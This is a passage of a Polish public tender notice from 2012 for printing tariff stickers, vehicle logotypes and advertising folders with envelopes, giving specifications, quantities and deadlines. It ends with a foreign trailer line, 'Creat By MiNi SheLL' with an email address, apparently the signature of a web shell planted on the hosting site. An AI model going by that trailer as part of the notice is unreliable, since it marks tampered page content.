roku w formie elektronicznej przy wykorzystaniu poczty elektronicznej lub FTP. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.92-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GRUPA 3 - WYKLEJKI TARYFOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA 3 - WYKLEJKI TARYFOWE: format netto: A4, wysokość - 297 mm; szerokość - 210 mm; pełen kolor 4/0; folia samoprzylepna biała błyszcząca; zabezpieczenie: folia połysk, ilość 350 (słownie: trzysta pięćdziesiąt) sztuk opis wyklejek taryfowych wskazanych w grupie 3: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego . Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. Sposób pakowania wyklejek taryfowych: po 50 (słownie: pięćdziesiąt) sztuk w paczce. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA 4 - LOGOTYPY NA POJAZDY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA 4 - LOGOTYPY NA POJAZDY: poz. 1 Logotyp nr 1: zadruk: 1/0 - biała farba; format netto: szerokość - 800 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folią błysk 1/0), ilość: 800 (słownie: osiemset) sztuk, poz. 2 logotyp nr 2: zadruk: 5/0 - pantony; dodatkowo pod zadrukiem należy umieścić podkład bazowy koloru białego; format netto: szerokość - 800 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folia błysk 1/0), ilość: 80 (słownie: osiemdziesiąt) sztuk , poz. 3 logotyp nr 3: zadruk: 4/0 - 3 kolory panton + biała farba (jeden z napisów jest wykonany białą farbą); dodatkowo pod zadrukiem należy umieścić podkład bazowy koloru białego; format netto: szerokość - 650 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folia błysk 1/0), ilość: 80 (słownie: osiemdziesiąt) sztuk , opis logotypów na pojazdy wskazanych w grupie 4: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego . Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. Sposób pakowania logotypów wskazanych poz. 1: po 50 (słownie: pięćdziesiąt) sztuk w paczce. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> GRUPA 5 - FOLDERY REKLAMOWE Z KOPERTAMI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA 5 - FOLDERY REKLAMOWE Z KOPERTAMI: Foldery reklamowe: liczba stron: 12 (słownie: dwanaście); format jednej strony: szerokość 240 mm x wysokość 200 mm; zadruk: kolory CMYK 4/4; papier - okładka: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) o gramaturze 350-370 g/m2 lub papier równoważny pod względem techniczno-użytkowym. Dodatkowo uszlachetnianie - folia matowa 1/1; papier - strony wewnętrzne: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) o gramaturze 150-175 g/m2 lub papier równoważny pod względem techniczno-użytkowym; zszycie kartek: metalowe zszywki, ilość: 700 (słownie: siedemset) sztuk, Koperty do folderów reklamowych wskazanych powyżej: format netto: szerokość 260 mm; wysokość 220 mm dopasowane do folderu; gramatura papieru 150-170 g/m2; papier kreda 170 g typu Claro (biała, dwustronnie powlekana, bezdrzewna) lub równoważna pod względem techniczno-użytkowym; nadruk - CMYK 4/0 przygotowany przez Zamawiającego; sztancowanie, klejenie; pasek z klejem zabezpieczony paskiem papierowym, ilość: 500 (słownie: pięćset) sztuk opis folderów wskazanych w grupie 5: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny wszystkich kart w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego. Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com